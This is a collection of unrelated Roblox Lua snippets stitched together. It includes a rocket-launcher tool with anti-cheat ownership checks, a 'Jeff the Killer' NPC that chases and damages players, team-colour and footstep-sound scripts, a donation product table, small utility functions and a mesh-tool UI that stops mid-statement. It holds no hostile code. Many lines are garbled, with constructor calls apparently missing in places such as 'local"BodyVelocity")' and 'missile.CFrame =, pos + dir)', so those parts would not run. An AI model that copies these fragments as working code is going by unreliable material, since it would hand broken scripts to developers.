--local Player=ModFx.GetPlayerFromTool(Tool) --[[This will be refreshed throughout the script -- so that if someone wanted to make the tools -- droppable, itd work with other players ]] -- commented cause its useless as a global variable, however not deleted so as to keep the above comments
local ColSer=game:GetService("CollectionService") local Debris=game:GetService("Debris") local function FireWep(plr,targetPos) if Tool.Enabled==false then return end local Player=ModFx.GetPlayerFromTool(Tool) if plr~=Player then return end local c=plr.Character if not c then return end local h=c:FindFirstChildWhichIsA("Humanoid") local plrTool=c:FindFirstChildWhichIsA("Tool") local Head=c:FindFirstChild("Head") if not Head or not plrTool or not h then return end if plrTool~=Tool then return end if h.Health<=0 then return end Tool.Enabled=false local dir = targetPos - Head.Position dir = dir*(1/dir.magnitude) local pos = Head.Position + (dir * 8) local ad=5000 local missile = Rocket:clone() missile.Name="Rocket" local"BodyVelocity") BV.Parent=missile BV.P=12500,ad,ad) BV.Velocity=dir*60 missile.CFrame =, pos + dir) local creator_tag ="ObjectValue") creator_tag.Value = plr creator_tag.Name = "creator" creator_tag.Parent = missile local exp=Tool.Handle.exp:Clone() exp.PlaybackSpeed=math.random(90,110)/100 exp.PlayOnRemove=true exp.Parent=missile local swoosh=Tool.Handle.swoosh:Clone() swoosh.PlaybackSpeed=math.random(95,105)/100 swoosh.Parent=missile missile.Parent = workspace ColSer:AddTag(missile,missile.Name) ColSer:AddTag(missile,plr.Name) missile:SetNetworkOwner(plr) swoosh:Play() local effect=plr:FindFirstChild("Effect") if effect and effect.Value~="None" then if effect.Value=="Fire" then"Fire",missile) else spawn(function() require(game:GetService("ReplicatedStorage").TrailModule).AddTrail(missile,effect.Value,.5,.5,1) end) end end Debris:AddItem(missile,10) wait(7) Tool.Enabled=true end Tool.Fire.OnServerEvent:Connect(FireWep) local function DestroyRocket(plr,Obj,ClientPos) local x=true local succ,err=pcall(function() if Obj:GetNetworkOwner()~=plr then x=false end end) if err then warn(plr.Name.." may be exploiting") return end -- Not sure how this would happen. if x==false then warn(plr.Name.." is definitely exploiting") --[[plr:Kick("Possible exploit detected")]] return end --[[ Why am I so confident that they're an exploiter if x==false? Because the network owner of the rocket is SET (as opposed to using auto network ownership) to the rocket's firer, and so if the part this remote is firing upon is NOT owned by the user firing the remote, then I know the remote is being fired externally. ]] local ServerPos=Obj.Position local creator=Obj:FindFirstChild("creator") local CreatorValue if creator then CreatorValue=creator.Value end local Player=ModFx.GetPlayerFromTool(Tool) if CreatorValue~=nil and CreatorValue==plr and Player and Player==plr and (ServerPos - ClientPos).magnitude < 20 and ColSer:HasTag(Obj,Obj.Name) and ColSer:HasTag(Obj,plr.Name) then -- all these to ensure that it's a rocket, and its their rocket, and its from their tool -- "(ServerPos - ClientPos).magnitude" = the distance between the serverside and clientside missile on hit Obj:ClearAllChildren() Debris:AddItem(Obj,0) ModFx.Explosion(CreatorValue,"Rocket",ClientPos) end end Tool.RocketDestroyEvent.OnServerEvent:connect(DestroyRocket)
-- unit.TextTransparency = -0.25 + 1.25*cosRot2 -- unit.BackgroundTransparency = 0.00 + 1.50*cosRot2
else unit.Visible = false end end end
--[[ By: Brutez. Script Fixed By Xcorrectgamermaster ]]
-- local JeffTheKillerScript=script; repeat wait(0.1)until JeffTheKillerScript and JeffTheKillerScript.Parent and JeffTheKillerScript.Parent.ClassName=="Model"and JeffTheKillerScript.Parent:FindFirstChild("Head")and JeffTheKillerScript.Parent:FindFirstChild("Torso"); local JeffTheKiller=JeffTheKillerScript.Parent; function raycast(Spos,vec,currentdist) local hit2,pos2=game.Workspace:FindPartOnRay(*.05),vec*currentdist),JeffTheKiller); if hit2~=nil and pos2 then if hit2.Name=="Handle" and not hit2.CanCollide or string.sub(hit2.Name,1,6)=="Effect"and not hit2.CanCollide then local currentdist=currentdist-(pos2-Spos).magnitude; return raycast(pos2,vec,currentdist); end; end; return hit2,pos2; end; function RayCast(Position,Direction,MaxDistance,IgnoreList) return game:GetService("Workspace"):FindPartOnRayWithIgnoreList(,Direction.unit*(MaxDistance or 999.999)),IgnoreList); end; local JeffTheKillerHumanoid; for _,Child in pairs(JeffTheKiller:GetChildren())do if Child and Child.ClassName=="Humanoid"and Child.Health~=0 then JeffTheKillerHumanoid=Child; end; end; local AttackDebounce=false; local JeffTheKillerKnife=JeffTheKiller:FindFirstChild("Torso"):FindFirstChild("Knife"); local JeffTheKillerHead=JeffTheKiller:FindFirstChild("Head"); local JeffTheKillerHumanoidRootPart=JeffTheKiller:FindFirstChild("HumanoidRootPart"); local WalkDebounce=false; local Notice=false; local JeffLaughDebounce=false; local MusicDebounce=false; local NoticeDebounce=false; local ChosenMusic; JeffTheKiller:FindFirstChild("Torso"):FindFirstChild("Neck"),1,0,-1,0,0,0,0,1,0,1,-0); local OriginalC0=JeffTheKiller:FindFirstChild("Torso"):FindFirstChild("Neck").C0; function FindNearestBae() local NoticeDistance=70; local TargetMain; for _,TargetModel in pairs(game:GetService("Workspace"):GetChildren())do if JeffTheKillerScript and JeffTheKiller and JeffTheKillerHumanoid and JeffTheKillerHumanoid.Health~=0 and TargetModel.className=="Model"and TargetModel~=JeffTheKiller and TargetModel.Name~=JeffTheKiller.Name and TargetModel:FindFirstChild("HumanoidRootPart")and TargetModel:FindFirstChild("Head")then local TargetPart=TargetModel:FindFirstChild("HumanoidRootPart"); local FoundHumanoid; for _,Child in pairs(TargetModel:GetChildren())do if Child and Child.ClassName=="Humanoid"and Child.Health~=0 then FoundHumanoid=Child; end; end; if TargetModel and TargetPart and FoundHumanoid and FoundHumanoid.Health~=0 and(TargetPart.Position-JeffTheKillerHumanoidRootPart.Position).magnitude<NoticeDistance then TargetMain=TargetPart; NoticeDistance=(TargetPart.Position-JeffTheKillerHumanoidRootPart.Position).magnitude; local hit,pos=raycast(JeffTheKillerHumanoidRootPart.Position,(TargetPart.Position-JeffTheKillerHumanoidRootPart.Position).unit,500) if hit and hit.Parent and hit.Parent.ClassName=="Model"and hit.Parent:FindFirstChild("HumaniodRootPart")and hit.Parent:FindFirstChild("Head")then if TargetModel and TargetPart and FoundHumanoid and FoundHumanoid.Health~=0 and(TargetPart.Position-JeffTheKillerHumanoidRootPart.Position).magnitude<15 and not AttackDebounce then spawn(function() AttackDebounce=true; local SwingAnimation=JeffTheKillerHumanoid:LoadAnimation(JeffTheKiller:FindFirstChild("Swing")); local SwingChoice=math.random(1,2); local HitChoice=math.random(1,3); SwingAnimation:Play(); SwingAnimation:AdjustSpeed(2.1+(math.random()*0.1)); if JeffTheKillerScript and JeffTheKiller and JeffTheKillerKnife then local SwingSound=JeffTheKiller:FindFirstChild("Torso"):FindFirstChild("Swing") SwingSound.Pitch=1+(math.random()*0.04); SwingSound:Play(); end; wait(0.2); if TargetModel and TargetPart and FoundHumanoid and FoundHumanoid.Health~=0 and(TargetPart.Position-JeffTheKillerHumanoidRootPart.Position).magnitude<8 then FoundHumanoid:TakeDamage(20); if HitChoice==1 and JeffTheKillerScript and JeffTheKiller and JeffTheKillerKnife and JeffTheKillerKnife:FindFirstChild("Hit1")then local HitSound=JeffTheKillerKnife:FindFirstChild("Hit1"); HitSound.Pitch=1+(math.random()*0.04); HitSound:Play(); elseif HitChoice==2 and JeffTheKillerScript and JeffTheKiller and JeffTheKillerKnife and JeffTheKillerKnife:FindFirstChild("Hit2")then local HitSound=JeffTheKillerKnife:FindFirstChild("Hit2"); HitSound.Pitch=1+(math.random()*0.04); HitSound:Play(); elseif HitChoice==3 and JeffTheKillerScript and JeffTheKiller and JeffTheKillerKnife and JeffTheKillerKnife:FindFirstChild("Hit3")then local HitSound=JeffTheKillerKnife:FindFirstChild("Hit3"); HitSound.Pitch=1+(math.random()*0.04); HitSound:Play(); end; end; wait(1); AttackDebounce=false; end); end; end; end; end; end; return TargetMain; end; while wait(0.1)do local TargetPoint=JeffTheKillerHumanoid.TargetPoint; local Blockage,BlockagePos=RayCast((,,JeffTheKillerHumanoidRootPart.Position.Y,TargetPoint.Z)).lookVector*(JeffTheKillerHumanoidRootPart.Size.Z/2)).p,JeffTheKillerHumanoidRootPart.CFrame.lookVector,(JeffTheKillerHumanoidRootPart.Size.Z*2.5),{JeffTheKiller,JeffTheKiller}) local Jumpable=false; if Blockage then wait(0.5) Jumpable=true; if Blockage and Blockage.Parent and Blockage.Parent.ClassName~="Workspace"then local BlockageHumanoid; for _,Child in pairs(Blockage.Parent:GetChildren())do if Child and Child.ClassName=="Humanoid"and Child.Health~=0 then BlockageHumanoid=Child; Jumpable=false; end; end; if Blockage and Blockage:IsA("Terrain")then local CellPos=Blockage:WorldToCellPreferSolid((,2,0))); local CellMaterial,CellShape,CellOrientation=Blockage:GetCell(CellPos.X,CellPos.Y,CellPos.Z); if CellMaterial==Enum.CellMaterial.Water then Jumpable=false; end; elseif BlockageHumanoid or Blockage.ClassName=="TrussPart"or Blockage.ClassName=="WedgePart"or Blockage.Name=="Handle"and Blockage.Parent.ClassName=="Hat"or Blockage.Name=="Handle"and Blockage.Parent.ClassName=="Tool" or Blockage.Parent.Name=="Humanoid" and Blockage.Parent.Name=="HumanoidRootPart" and Blockage.Parent.ClassName=="Humanoid" then Jumpable=false; end; end; if JeffTheKillerScript and JeffTheKiller and JeffTheKillerHumanoid and JeffTheKillerHumanoid.Health~=0 and not JeffTheKillerHumanoid.Sit and Jumpable then JeffTheKillerHumanoid.Jump=true; end; end; if JeffTheKillerScript and JeffTheKiller and JeffTheKillerHead and JeffTheKillerHumanoidRootPart and JeffTheKillerHead:FindFirstChild("RakeStep")and (,JeffTheKillerHumanoidRootPart.Velocity.y,0)).magnitude>=5 and not WalkDebounce and JeffTheKillerHumanoid and JeffTheKillerHumanoid.Health~=0 then spawn(function() WalkDebounce=true; local,,-4,0)); local RayTarget,endPoint=game:GetService("Workspace"):FindPartOnRay(FiredRay,JeffTheKiller); if RayTarget then local JeffTheKillerHeadFootStepClone=JeffTheKillerHead:FindFirstChild("RakeStep"):Clone(); JeffTheKillerHeadFootStepClone.Parent=JeffTheKillerHead; JeffTheKillerHeadFootStepClone:Play(); JeffTheKillerHeadFootStepClone:Destroy(); if JeffTheKillerScript and JeffTheKiller and JeffTheKillerHumanoid and JeffTheKillerHumanoid.Health~=0 and JeffTheKillerHumanoid.WalkSpeed<17 then wait(0.4); elseif JeffTheKillerScript and JeffTheKiller and JeffTheKillerHumanoid and JeffTheKillerHumanoid.Health~=0 and JeffTheKillerHumanoid.WalkSpeed>17 then wait(0.15); end end; WalkDebounce=false; end); end; local MainTarget=FindNearestBae(); local FoundHumanoid; if MainTarget then for _,Child in pairs(MainTarget.Parent:GetChildren())do if Child and Child.ClassName=="Humanoid"and Child.Health~=0 then FoundHumanoid=Child; end; end; end; if JeffTheKillerScript and JeffTheKiller and JeffTheKillerHumanoid and JeffTheKillerHumanoid.Health~=0 and MainTarget and FoundHumanoid and FoundHumanoid.Health~=0 and(MainTarget.Position-JeffTheKillerHumanoidRootPart.Position).magnitude<99999999999999999999 then if JeffTheKillerScript and JeffTheKiller and JeffTheKillerHead and JeffTheKillerHead:FindFirstChild("RakeTheme")and not JeffTheKillerHead:FindFirstChild("RakeTheme").IsPlaying then JeffTheKillerHead:FindFirstChild("RakeTheme").Volume=JeffTheKiller:FindFirstChild("Configuration"):FindFirstChild("RakeThemeVolume").Value; JeffTheKillerHead:FindFirstChild("RakeTheme"):Play(); end; elseif JeffTheKillerScript and JeffTheKiller and JeffTheKillerHumanoid and JeffTheKillerHumanoid.Health~=0 and MainTarget and FoundHumanoid and FoundHumanoid.Health~=0 and(MainTarget.Position-JeffTheKillerHumanoidRootPart.Position).magnitude>9999999999999999999 then if JeffTheKillerScript and JeffTheKiller and JeffTheKillerHead and JeffTheKillerHead:FindFirstChild("RakeTheme")and JeffTheKillerHead:FindFirstChild("RakeTheme").IsPlaying then if not JeffLaughDebounce then spawn(function() JeffLaughDebounce=true; repeat wait(0.1);if JeffTheKillerScript and JeffTheKiller and JeffTheKillerHead and JeffTheKillerHead:FindFirstChild("RakeTheme")then JeffTheKillerHead:FindFirstChild("RakeTheme").Volume=JeffTheKillerHead:FindFirstChild("RakeTheme").Volume-0.1;else break;end;until JeffTheKillerHead:FindFirstChild("RakeTheme").Volume==0 or JeffTheKillerHead:FindFirstChild("RakeTheme").Volume<0; JeffTheKillerHead:FindFirstChild("RakeTheme").Volume=0; JeffTheKillerHead:FindFirstChild("RakeTheme"):Stop(); JeffLaughDebounce=false; end); end; end; end; if not ChosenMusic and JeffTheKillerScript and JeffTheKiller and JeffTheKillerHumanoid and JeffTheKillerHumanoid.Health~=0 and MainTarget and FoundHumanoid and FoundHumanoid.Health~=0 and(MainTarget.Position-JeffTheKillerHumanoidRootPart.Position).magnitude<50 then local MusicChoice=math.random(1,2); if MusicChoice==1 and JeffTheKillerScript and JeffTheKiller and JeffTheKiller:FindFirstChild("Jeff_Scene_Sound1")then ChosenMusic=JeffTheKiller:FindFirstChild("Jeff_Scene_Sound1"); elseif MusicChoice==2 and JeffTheKillerScript and JeffTheKiller and JeffTheKiller:FindFirstChild("Jeff_Scene_Sound2")then ChosenMusic=JeffTheKiller:FindFirstChild("Jeff_Scene_Sound2"); end; if JeffTheKillerScript and JeffTheKiller and ChosenMusic and not ChosenMusic.IsPlaying then ChosenMusic.Volume=0.5; ChosenMusic:Play(); end; elseif JeffTheKillerScript and JeffTheKiller and JeffTheKillerHumanoid and JeffTheKillerHumanoid.Health~=0 and MainTarget and FoundHumanoid and FoundHumanoid.Health~=0 and(MainTarget.Position-JeffTheKillerHumanoidRootPart.Position).magnitude>50 then if JeffTheKillerScript and JeffTheKiller and ChosenMusic and ChosenMusic.IsPlaying then if not MusicDebounce then spawn(function() MusicDebounce=true; repeat wait(0.1);if JeffTheKillerScript and JeffTheKiller and ChosenMusic then ChosenMusic.Volume=ChosenMusic.Volume-0.01;else break;end;until ChosenMusic.Volume==0 or ChosenMusic.Volume<0; if ChosenMusic then ChosenMusic.Volume=0; ChosenMusic:Stop(); end; ChosenMusic=nil; MusicDebounce=false; end); end; end; end; if not MainTarget and not JeffLaughDebounce then spawn(function() JeffLaughDebounce=true; repeat wait(0.1);if JeffTheKillerScript and JeffTheKiller and JeffTheKillerHead and JeffTheKillerHead:FindFirstChild("RakeTheme")then JeffTheKillerHead:FindFirstChild("RakeTheme").Volume=JeffTheKillerHead:FindFirstChild("RakeTheme").Volume-0.1;else break;end;until JeffTheKillerHead:FindFirstChild("RakeTheme").Volume==0 or JeffTheKillerHead:FindFirstChild("RakeTheme").Volume<0; JeffTheKillerHead:FindFirstChild("RakeTheme").Volume=0; JeffTheKillerHead:FindFirstChild("RakeTheme"):Stop(); JeffLaughDebounce=false; end); end; if not MainTarget and not MusicDebounce then spawn(function() MusicDebounce=true; repeat wait(0.1);if JeffTheKillerScript and JeffTheKiller and ChosenMusic then ChosenMusic.Volume=ChosenMusic.Volume-0.01;else break;end;until ChosenMusic.Volume==0 or ChosenMusic.Volume<0; if ChosenMusic then ChosenMusic.Volume=0; ChosenMusic:Stop(); end; ChosenMusic=nil; MusicDebounce=false; end); end; if MainTarget then Notice=true; if Notice and not NoticeDebounce and JeffTheKillerScript and JeffTheKiller and JeffTheKillerHead and JeffTheKillerHead:FindFirstChild("Found")then JeffTheKiller.Target.Value = true; JeffTheKillerHead:FindFirstChild("Found"):Play(); wait(0.4); JeffTheKillerHead:FindFirstChild("RakeScream"):Play(); NoticeDebounce=true; end; if JeffTheKillerScript and JeffTheKiller and JeffTheKillerHumanoid and JeffTheKillerHumanoid.Health~=0 then if MainTarget and FoundHumanoid and FoundHumanoid.Health~=0 and(MainTarget.Position-JeffTheKillerHumanoidRootPart.Position).magnitude>5 then JeffTheKillerHumanoid.WalkSpeed=JeffTheKiller.Configuration.WalkSpeed.Value; elseif MainTarget and FoundHumanoid and FoundHumanoid.Health~=0 and(MainTarget.Position-JeffTheKillerHumanoidRootPart.Position).magnitude<5 then JeffTheKillerHumanoid.WalkSpeed=1; end; JeffTheKillerHumanoid:MoveTo(MainTarget.Position+(MainTarget.Position-JeffTheKillerHumanoidRootPart.Position).unit*2,game:GetService("Workspace"):FindFirstChild("Terrain")); local NeckRotation=(JeffTheKiller:FindFirstChild("Torso").Position.Y-MainTarget.Parent:FindFirstChild("Head").Position.Y)/10; if NeckRotation>-1.5 and NeckRotation<1.5 then JeffTheKiller:FindFirstChild("Torso"):FindFirstChild("Neck").C0=OriginalC0*CFrame.fromEulerAnglesXYZ(NeckRotation,0,0); end; if NeckRotation<-1.5 then JeffTheKiller:FindFirstChild("Torso"):FindFirstChild("Neck"),1,0,-1,0,0,0,-0.4,0.1,0,0.1,0.9); elseif NeckRotation>1.5 then JeffTheKiller:FindFirstChild("Torso"):FindFirstChild("Neck"),1,0,-1,0,0,0,0.1,0.08,0,0.08,-0.2); end; else end; else Notice=false; NoticeDebounce=false; JeffTheKiller:FindFirstChild("Torso"):FindFirstChild("Neck"),1,0,-1,0,0,0,0,1,0,1,-0); if JeffTheKillerScript and JeffTheKiller and JeffTheKillerHumanoid and JeffTheKillerHumanoid.Health~=0 then JeffTheKillerHumanoid.WalkSpeed=12; JeffTheKiller.Target.Value=false; end; end; spawn(function() local AlreadyDo=false; while wait(0.1) do if JeffTheKiller.Target.Value==false and AlreadyDo==false then JeffTheKillerHead.Mouth.Transparency=1; JeffTheKillerHead.Mouth2.Transparency=0; JeffTheKillerHead.Mouth2.MouthDecal.Transparency=0; JeffTheKiller.Wander.Disabled=false; AlreadyDo=true; wait(5); AlreadyDo=false; end; if JeffTheKiller.Target.Value==true and AlreadyDo==false then JeffTheKillerHead.Mouth.Transparency=0; JeffTheKillerHead.Mouth2.Transparency=1; JeffTheKillerHead.Mouth2.MouthDecal.Transparency=1; JeffTheKiller.Wander.Disabled=true; AlreadyDo=true; wait(5); AlreadyDo=false; end; end; end); spawn(function() while JeffTheKillerHumanoid.Health > 1 do wait(1); JeffTheKiller:FindFirstChild("Torso").Blood.Enabled = false; JeffTheKiller:FindFirstChild("Torso").Blood2.Enabled = false;"Institutional white");"Institutional white"); end; end); if JeffTheKillerScript and JeffTheKiller and JeffTheKillerHumanoid then JeffTheKillerHumanoid.DisplayDistanceType="None"; JeffTheKillerHumanoid.HealthDisplayDistance=0; JeffTheKillerHumanoid.Name="NPC"; JeffTheKillerHumanoid.NameDisplayDistance=0; JeffTheKillerHumanoid.NameOcclusion="EnemyOcclusion"; JeffTheKillerHumanoid.AutoJumpEnabled=true; JeffTheKillerHumanoid.AutoRotate=true; JeffTheKillerHumanoid.MaxHealth=2000; JeffTheKillerHumanoid.JumpPower=80; JeffTheKillerHumanoid.MaxSlopeAngle=89.9; end; if JeffTheKillerScript and JeffTheKiller and JeffTheKillerHumanoid and not JeffTheKillerHumanoid.AutoJumpEnabled then JeffTheKillerHumanoid.AutoJumpEnabled=true; end; if JeffTheKillerScript and JeffTheKiller and JeffTheKillerHumanoid and not JeffTheKillerHumanoid.AutoRotate then JeffTheKillerHumanoid.AutoRotate=true; end; if JeffTheKillerScript and JeffTheKiller and JeffTheKillerHumanoid and JeffTheKillerHumanoid.PlatformStand then JeffTheKillerHumanoid.PlatformStand=false; end; if JeffTheKillerScript and JeffTheKiller and JeffTheKillerHumanoid and JeffTheKillerHumanoid.Sit then JeffTheKillerHumanoid.Sit=false; end; end;
-- Now with exciting TeamColors HACK!
function waitForChild(parent, childName) local child = parent:findFirstChild(childName) if child then return child end while true do child = parent.ChildAdded:wait() if child.Name==childName then return child end end end -- TEAM COLORS function onTeamChanged(player) wait(1) local char = player.Character if char == nil then return end if player.Neutral then -- Replacing the current BodyColor object will force a reset local old = char:findFirstChild("Body Colors") if not old then return end old:clone().Parent = char old.Parent = nil else local head = char:findFirstChild("Head") local torso = char:findFirstChild("Torso") local left_arm = char:findFirstChild("Left Arm") local right_arm = char:findFirstChild("Right Arm") local left_leg = char:findFirstChild("Left Leg") local right_leg = char:findFirstChild("Right Leg") if head then head.BrickColor = end if torso then torso.BrickColor = player.TeamColor end if left_arm then left_arm.BrickColor = end if right_arm then right_arm.BrickColor = end if left_leg then left_leg.BrickColor = end if right_leg then right_leg.BrickColor = end end end function onPlayerPropChanged(property, player) if property == "Character" then onTeamChanged(player) end if property== "TeamColor" or property == "Neutral" then onTeamChanged(player) end end local cPlayer = game.Players:GetPlayerFromCharacter(script.Parent) cPlayer.Changed:connect(function(property) onPlayerPropChanged(property, cPlayer) end ) onTeamChanged(cPlayer)
-- connect events
Humanoid.Died:connect(onDied) Humanoid.Running:connect(onRunning) Humanoid.Climbing:connect(onClimbing) Humanoid.GettingUp:connect(onGettingUp) Humanoid.FreeFalling:connect(onFreeFall) Humanoid.FallingDown:connect(onFallingDown) Humanoid.Seated:connect(onSeated) Humanoid.PlatformStanding:connect(onPlatformStanding) Humanoid.Swimming:connect(onSwimming)
-- Events
local Events = ReplicatedStorage:FindFirstChild("Events") local LoadCharacter = Events:FindFirstChild("LoadCharacter") local LoadSpeeder = Events:FindFirstChild("LoadSpeeder")
--These are all donations that can be done. You must set this up with your own products to make money of it. --To make a product you have to make a Developer Product in your game's settings page. --You can make as many as you want, Once you made one, copy it's ID and past it in the 'ProductId' variable in this script. --Change the 'ProductPrice' to what the Developer Product Costs.
local module = {} module.Products = { { ProductPrice = 5, --The price from the Developer Product. ProductId = 33152750 -- The ID from the Developer Product. }, { ProductPrice = 10, --The price from the Developer Product. ProductId = 33152755 -- The ID from the Developer Product. }, { ProductPrice = 50, --The price from the Developer Product. ProductId = 33152758 -- The ID from the Developer Product. }, { ProductPrice = 100, --The price from the Developer Product. ProductId = 33152760 -- The ID from the Developer Product. }, }
-- Mounts the custom material walking sounds into the provided -- humanoid. This mounting assumes the HumanoidRootPart is the -- part that will be storing the character's "Running" sound.
function CharacterRealism:MountMaterialSounds(humanoid) local character = humanoid.Parent local rootPart = character and character:WaitForChild("HumanoidRootPart", 10) if not (rootPart and rootPart:IsA("BasePart")) then return end Util:PromiseChild(rootPart, "Running", function (running) if not running:IsA("Sound") then return end local oldPitch ="NumberValue") oldPitch.Name = "OldPitch" oldPitch.Parent = running oldPitch.Value = 1 local function onStateChanged(old, new) if new.Name:find("Running") then while humanoid:GetState() == new do local hipHeight = humanoid.HipHeight if humanoid.RigType.Name == "R6" then hipHeight = 2.8 end local scale = hipHeight / 3 local speed = (rootPart.Velocity * XZ_VECTOR3).Magnitude local volume = ((speed - 4) / 12) * scale running.Volume = math.clamp(volume, 0, 1) local pitch = oldPitch.Value / ((scale * 15) / speed) running.Pitch = pitch RunService.Heartbeat:Wait() end end end local function updateRunningSoundId() local soundId = self.Sounds.Concrete local material = humanoid.FloorMaterial.Name if not self.Sounds[material] then if not self.MaterialMap[material] then material = self.Sounds.Concrete else material = self.MaterialMap[material] end end if self.Sounds[material] then soundId = self.Sounds[material] end running.SoundId = "rbxassetid://" .. soundId end local floorListener = humanoid:GetPropertyChangedSignal("FloorMaterial") floorListener:Connect(updateRunningSoundId) running.EmitterSize = 1 running.MaxDistance = 50 updateRunningSoundId() humanoid.StateChanged:Connect(onStateChanged) onStateChanged(nil, Enum.HumanoidStateType.Running) end) end
--[[** Checks if the player is in the given group. @param [Instance<Player>] Player The player you are checking for. Can also be their UserID. @param [Integer] GroupID The group you are checking. @returns [Boolean] Whether or not the player is in the group. **--]]
function GroupService:IsInGroupAsync(Player, GroupID) for _, Group in ipairs(GroupService:GetGroupsAsync(Player)) do if Group.Id == GroupID then return true end end return false end
--[[** ensures value is a number where min <= value @param min The minimum to use @returns A function that will return true iff the condition is passed **--]]
function t.numberMin(min) return function(value) local success, errMsg = t.number(value) if not success then return false, errMsg or "" end if value >= min then return true else return false, string.format("number >= %s expected, got %s", min, value) end end end
-- Container for temporary connections (disconnected automatically)
local Connections = {}; function MeshTool.Equip() -- Enables the tool's equipped functionality -- Start up our interface ShowUI(); end; function MeshTool.Unequip() -- Disables the tool's equipped functionality -- Clear unnecessary resources HideUI(); ClearConnections(); end; function ClearConnections() -- Clears out temporary connections for ConnectionKey, Connection in pairs(Connections) do Connection:Disconnect(); Connections[ConnectionKey] = nil; end; end; function ShowUI() -- Creates and reveals the UI -- Reveal UI if already created if MeshTool.UI then -- Reveal the UI MeshTool.UI.Visible = true; -- Update the UI every 0.1 seconds UIUpdater = Support.ScheduleRecurringTask(UpdateUI, 0.1); -- Skip UI creation return; end; -- Create the UI MeshTool.UI = Core.Tool.Interfaces.BTMeshToolGUI:Clone(); MeshTool.UI.Parent = Core.UI; MeshTool.UI.Visible = true; local AddButton = MeshTool.UI.AddButton; local RemoveButton = MeshTool.UI.RemoveButton; local MeshIdInput = MeshTool.UI.MeshIdOption.TextBox; local TextureIdInput = MeshTool.UI.TextureIdOption.TextBox; local VertexColorInput = MeshTool.UI.TintOption.HSVPicker; MeshTypes = { Block = Enum.MeshType.Brick, Cylinder = Enum.MeshType.Cylinder, File = Enum.MeshType.FileMesh, Head = Enum.MeshType.Head, Sphere = Enum.MeshType.Sphere, Wedge = Enum.MeshType.Wedge }; -- Sort the mesh types SortedMeshTypes = Support.Keys(MeshTypes); table.sort(SortedMeshTypes); -- Create type dropdown local function BuildTypeDropdown() return Roact.createElement(Dropdown, { Position =, 40, 0, 0); Size =, -40, 0, 25); Options = SortedMeshTypes; MaxRows = 6; CurrentOption = MeshTool.CurrentType; OnOptionSelected = function (Option) SetProperty('MeshType', MeshTypes[Option]) end; }) end -- Mount type dropdown local TypeDropdownHandle = Roact.mount(BuildTypeDropdown(), MeshTool.UI.TypeOption, 'Dropdown') MeshTool.OnTypeChanged:Connect(function () Roact.update(TypeDropdownHandle, BuildTypeDropdown()) end) -- Enable the scale inputs local XScaleInput = MeshTool.UI.ScaleOption.XInput.TextBox; local YScaleInput = MeshTool.UI.ScaleOption.YInput.TextBox; local ZScaleInput = MeshTool.UI.ScaleOption.ZInput.TextBox; XScaleInput.FocusLost:Connect(function (EnterPressed) local NewScale = tonumber(XScaleInput.Text); SetAxisScale('X', NewScale); end); YScaleInput.FocusLost:Connect(function (EnterPressed) local NewScale = tonumber(YScaleInput.Text); SetAxisScale('Y', NewScale); end); ZScaleInput.FocusLost:Connect(function (EnterPressed) local NewScale = tonumber(ZScaleInput.Text); SetAxisScale('Z', NewScale); end); -- Enable the offset inputs local XOffsetInput = MeshTool.UI.OffsetOption.XInput.TextBox; local YOffsetInput = MeshTool.UI.OffsetOption.YInput.TextBox; local ZOffsetInput = MeshTool.UI.OffsetOption.ZInput.TextBox; XOffsetInput.FocusLost:Connect(function (EnterPressed) local NewOffset = tonumber(XOffsetInput.Text); SetAxisOffset('X', NewOffset); end); YOffsetInput.FocusLost:Connect(function (EnterPressed) local NewOffset = tonumber(YOffsetInput.Text); SetAxisOffset('Y', NewOffset); end); ZOffsetInput.FocusLost:Connect(function (EnterPressed) local NewOffset = tonumber(ZOffsetInput.Text); SetAxisOffset('Z', NewOffset); end); -- Enable the mesh ID input MeshIdInput.FocusLost:Connect(function (EnterPressed) SetMeshId(ParseAssetId(MeshIdInput.Text)); end); -- Enable the texture ID input TextureIdInput.FocusLost:Connect(function (EnterPressed) SetTextureId(ParseAssetId(TextureIdInput.Text)); end); -- Enable the vertex color/tint option local ColorPickerHandle = nil VertexColorInput.MouseButton1Click:Connect(function () local CommonColor = VectorToColor(Support.IdentifyCommonProperty(GetMeshes(), 'VertexColor')) local ColorPickerElement = Roact.createElement(ColorPicker, { InitialColor = CommonColor or Color3.fromRGB(255, 255, 255); SetPreviewColor = function (Color) SetPreviewTint(ColorToVector(Color)) end; OnConfirm = function (Color) SetProperty('VertexColor', ColorToVector(Color)) ColorPickerHandle = Roact.unmount(ColorPickerHandle) end; OnCancel = function () ColorPickerHandle = Roact.unmount(ColorPickerHandle) end; }) ColorPickerHandle = ColorPickerHandle and Roact.update(ColorPickerHandle, ColorPickerElement) or Roact.mount(ColorPickerElement, Core.UI, 'ColorPicker') end) -- Enable the mesh adding button AddButton.Button.MouseButton1Click:Connect(function () AddMeshes(); end); RemoveButton.Button.MouseButton1Click:Connect(function () RemoveMeshes(); end); -- Hook up manual triggering local SignatureButton = MeshTool.UI:WaitForChild('Title'):WaitForChild('Signature') ListenForManualWindowTrigger(MeshTool.ManualText, MeshTool.Color.Color, SignatureButton) -- Update the UI every 0.1 seconds UIUpdater = Support.ScheduleRecurringTask(UpdateUI, 0.1); end; function UpdateUI() -- Updates information on the UI -- Make sure the UI's on if not MeshTool.UI then return; end; -- Get all meshes local Meshes = GetMeshes(); -- Identify all common properties local MeshType = Support.IdentifyCommonProperty(Meshes, 'MeshType'); local MeshId = Support.IdentifyCommonProperty(Meshes, 'MeshId'); local TextureId = Support.IdentifyCommonProperty(Meshes, 'TextureId'); local VertexColor = VectorToColor(Support.IdentifyCommonProperty(Meshes, 'VertexColor')); -- Check if there's a file mesh in the selection local FileMeshInSelection = false; for _, Mesh in pairs(GetMeshes()) do if Mesh.MeshType == Enum.MeshType.FileMesh then FileMeshInSelection = true; break; end; end; -- Identify common scales and offsets across axes local XScaleVariations, YScaleVariations, ZScaleVariations = {}, {}, {}; local XOffsetVariations, YOffsetVariations, ZOffsetVariations = {}, {}, {}; for _, Mesh in pairs(GetMeshes()) do table.insert(XScaleVariations, Support.Round(Mesh.Scale.X, 3)); table.insert(YScaleVariations, Support.Round(Mesh.Scale.Y, 3)); table.insert(ZScaleVariations, Support.Round(Mesh.Scale.Z, 3)); table.insert(XOffsetVariations, Support.Round(Mesh.Offset.X, 3)); table.insert(YOffsetVariations, Support.Round(Mesh.Offset.Y, 3)); table.insert(ZOffsetVariations, Support.Round(Mesh.Offset.Z, 3)); end; local CommonXScale = Support.IdentifyCommonItem(XScaleVariations); local CommonYScale = Support.IdentifyCommonItem(YScaleVariations); local CommonZScale = Support.IdentifyCommonItem(ZScaleVariations); local CommonXOffset = 